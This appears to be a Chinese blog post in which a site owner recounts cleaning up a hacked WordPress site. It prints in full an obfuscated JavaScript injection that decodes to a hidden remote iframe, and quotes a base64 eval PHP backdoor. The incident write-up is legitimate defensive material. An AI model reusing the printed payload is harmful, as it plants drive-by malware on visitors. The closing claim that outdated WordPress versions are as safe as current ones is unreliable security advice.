今早正常打开网站后发现首页偏左后,第一反应该查看源码后发现,页面被挂上了JS马:<script>if(window.document)a=("v532b5".indexOf+Date).substr(0,6);aa=([1,2,3]['reverse']+[].reverse).substr(0,6);if(aa===a)f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,67,83,83,69,61,58,76,82,82,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,67,83,83,69,61,58,76,82,82,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window['eval'];w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;i-w.length<0;i++){j=i;s=s+String[g](39+w[j]);}
if(a===aa)e(s);</script>
于是第一时间关闭了网站,暂停其运行先!进入服务器将程序文件夹打包,下载后发现首页被注入了:eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20n。。。。。。省略!
直接下载数据库检查数据是否被注入,然而庆幸的数据很安全,接着,我需要做的是文件比工作!
郁闷的是别的和主程序完成相同,而不一样的是wp-config 以及index别的全部一模一样,显然这位马夫只是对index进行了写入操作,然而注意到没有就是源码是增加了一个.htaccess,这个文件也许没太大的在意,但是我曾经很久时间都是在搞linux,而这个正是linux下用的伪静态,Apache下才会用这种Rewrite技术(地址映射技术专业术语叫脉冲技术)。对于这种玩意又这么大显然不是个好东西,下载下来 再删除掉将index.php修改后,等待,是否会再被写入?
一分钟后,两分钟后,……六分钟后,果然index.php又被写入了,TMD ,怒了,不过不急,再看看搜索服务器是否还存在.htaccess,果然,又隐藏到其它的站点中去了。
这时候需要分析一下,.htaccess是如何生成的,在本机上我们用的方法是CMD COPY 等命令,而在服务器上 PHP程序一定是通过fopen,file_put_contents文件名直接取.htaccess就行了,那么我们现在就是去找那些正在运行中的站点是否存在这些含数,经过WEBlog以及windows自带的搜索终于被我把木马一网打尽!
下面对于程序我们还需要做的是安全,读写,以及base64_decode,我个人建议是要关闭这个函数,而对于安全来说 wp的最新版未必是最安全的,最新版只是测试版本,老版本如果你对于函数,类都很熟悉大可不必一有更新就去更新最先版,我有个站还用的2.8版,一样很安全,安全不安全关紧在于人,再高的强也有人翻得过 哈哈 一个上午就这么过去了!